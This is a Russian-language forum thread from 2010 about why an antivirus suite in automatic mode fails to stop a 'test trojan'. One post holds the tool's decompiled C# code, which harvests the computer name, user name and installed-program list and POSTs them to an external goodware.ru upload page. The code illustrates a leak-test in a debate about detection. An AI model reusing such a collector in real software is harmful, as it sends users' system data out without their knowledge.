SLASH_id Опубликовано 24 мая, 2010 Поделиться Опубликовано 24 мая, 2010 (изменено) Мда..... Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос? Изменено 24 мая, 2010 пользователем SLASH_id Ссылка на комментарий Поделиться на другие сайты Поделиться
Андрей Опубликовано 24 мая, 2010 Поделиться Опубликовано 24 мая, 2010 Что опасного в этой программе, почему она должна детектироваться? Вы скачали её и запустили целеустремленно на компьютере, к которому у вас есть доступ, а как вы её на моем запустите? Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 24 мая, 2010 Поделиться Опубликовано 24 мая, 2010 Но если НАПИСАНО что "Запрос действия" то где запрос? это судя по всему работает только в неавторежиме. надо у Данилки переспросить Ссылка на комментарий Поделиться на другие сайты Поделиться
AgentMC Опубликовано 24 мая, 2010 Поделиться Опубликовано 24 мая, 2010 (изменено) Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос? Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке! Запросы действия в блонди-моде интерпретируются как "разрешить". Песец... прога на C# написана. Код: Раскрывающийся текст: private void MainForm_Load(object sender, EventArgs e) { StringBuilder builder = new StringBuilder(); try { builder.AppendFormat("<h1>Информация, полученная от проверочного трояна</h1><b>Загружено:</b> {2}<br/><b>Компьютер:</b> {0}<br/><b>Пользователь:</b> {1}<br/><br/><h2>Установленные программы:</h2><blockquote style=\"width: 700px; height: 500px; overflow: scroll\">", Environment.MachineName, Environment.UserName, DateTime.Now.ToString()); RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"); foreach (string str in key.GetSubKeyNames()) { try { RegistryKey key2 = key.OpenSubKey(str); object obj2 = key2.GetValue("DisplayName"); object obj3 = key2.GetValue("DisplayVersion"); if ((obj2 != null) && (obj2.ToString().Trim() != "")) { string str2 = string.Format("<b>{0}</b> {1}<br/>", obj2.ToString(), (obj3 == null) ? "" : ("(" + obj3.ToString() + ")")); builder.Append(str2); } key2.Close(); } catch (Exception exception) { builder.Append(exception.ToString()); } } key.Close(); builder.Append("</blockquote>"); } catch (Exception exception2) { builder.Append(exception2.ToString()); } try { string str3 = Guid.NewGuid().ToString("N"); string str4 = string.Format("session={0}&info={1}", str3, HttpUtility.UrlEncode(builder.ToString())); WebRequest request = WebRequest.Create("http://www.goodware.ru/trojan/upload.php"); request.Method = "POST"; request.ContentType = "application/x-www-form-urlencoded"; request.ContentLength = str4.Length; StreamWriter writer = new StreamWriter(request.GetRequestStream()); writer.Write(str4); writer.Close(); using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream())) { reader.ReadToEnd(); this.UpdateResult(string.Format("http://www.goodware.ru/trojan/check.php?session={0}", str3), "Информация об установленных на Вашем компьютере программах была успешно собрана и беспрепятственно отправлена на наш сайт. Вы можете посмотреть ее по этой ссылке:\n\n{0}\n\nДанная информация будет доступна по этой ссылке в течении суток, затем она удаляется с сайта."); } } catch (Exception exception3) { this.UpdateResult("http://www.goodware.ru/trojan/", string.Format("Информация об установленных на Вашем компьютере программах была успешно собрана, но при отправке произошла ошибка:\n\n{0}\n\nВозможно, но не обязательно, это связано с успешной работой антивирусной программы или фаервола.\nВы можете свой оставить отзыв по этой ссылке:\n\n{{0}}\n\nНапишите текст ошибки и какой программой для защиты Вы пользуетесь. Возможно, это поможет другим.", exception3.Message)); } } private void UpdateResult(string link, string text) { this._linkUrl = link; this.lnkResult.Text = string.Format(text, link); this.lnkResult.LinkArea = new LinkArea(this.lnkResult.Text.IndexOf(link), link.Length); } private void lnkResult_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e) { Process.Start(this._linkUrl); } SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - вот где прога шарится до смерти просто. В этой ветке нет личной информации пользователя - только список софта на машине. С чего бы вдруг ПДМу это блочить? //Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить. Изменено 24 мая, 2010 пользователем AgentMC Ссылка на комментарий Поделиться на другие сайты Поделиться
Umnik Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 //Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить. Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные. Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные. а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений? Ссылка на комментарий Поделиться на другие сайты Поделиться
пользователь Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений? Не все. Далеко не все. Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось. А ведь этот пример идеально повторяет этот "тест". Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось. А ведь этот пример идеально повторяет этот "тест". KIS выдаст алерт и вы сами разрешите действие программе, это не проблема... Ссылка на комментарий Поделиться на другие сайты Поделиться
SLASH_id Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!Запросы действия в блонди-моде интерпретируются как "разрешить". Это понятно)) Возникло предложение к следующей версии продукта, вместо кружочков с вопросами, и подобных типа запрет или наследование отрисовывать кружочек с буковкой "А" если включен авторежим. А то третьеклассник-чайник посмотрит - ага, стоит запрос и будет возмущаться чего ж не спрашивает. Тем более при установке КИСа не спрашивает режим, а ставит автоматику по дефолту. Ссылка на комментарий Поделиться на другие сайты Поделиться
AgentMC Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 (изменено) Возникло предложениеВроде внимательно смотрел... не нашёл Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.Во втором часу ночи формулировка свелась уже к "если прога из Сл.Огр. читает более 40 ключей реестрав разных ветках, а затем пытается отослать информацию в виде единого ПОСТ-запроса по хттп независимо от порта" -> ... Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.На спецсофт есть админ, который в курсе, что такое интерактив. Изменено 25 мая, 2010 пользователем AgentMC Ссылка на комментарий Поделиться на другие сайты Поделиться
Kapral Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 Я бы слегка расстроился, если у него не получилось.А уж как расстроится бухгалтерия когда их инфо-система с последними редакциями указявок от правительства не запустится...... На спецсофт есть админ, который в курсе,На спец-софт - есть не только админ - но и корпоративка Ссылка на комментарий Поделиться на другие сайты Поделиться
SeveNth AngeL Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 У меня киса тож без б пропускает Ссылка на комментарий Поделиться на другие сайты Поделиться
пользователь Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 (изменено) KIS выдаст алерт и вы сами разрешите действие программе, это не проблема... Это ваше право - настройте соответственно. Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным. Только не говорите мне, что домушники могут таким образом собирать сведения о компьютерах, чтобы планировать свои кражи - я смеяться буду. На спецсофт есть админ, который в курсе, что такое интерактив. А если это домашний софт? Например, игра подобно сталкеру, использующая технологию старфорса "резервная копия"? Изменено 25 мая, 2010 пользователем пользователь Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 Это ваше право - настройте соответственно. то есть включить интерактивный режим? аиесли я хочу принимать решения только по сетевой активности? Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным. заметьте, вы сами пишете что имхо. ваше право так считать. а я например считаю, что любой софт без моего ведома не должен собирать какую либо информацию с моего ПК и передавать ее куда-то? вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее Ссылка на комментарий Поделиться на другие сайты Поделиться
Kapral Опубликовано 25 мая, 2010 Поделиться Опубликовано 25 мая, 2010 вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее Да без проблем Включается интерактивный режим - все что на автомат - ставите или разрешить или запретить. А что нужно - Вопр.знак Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти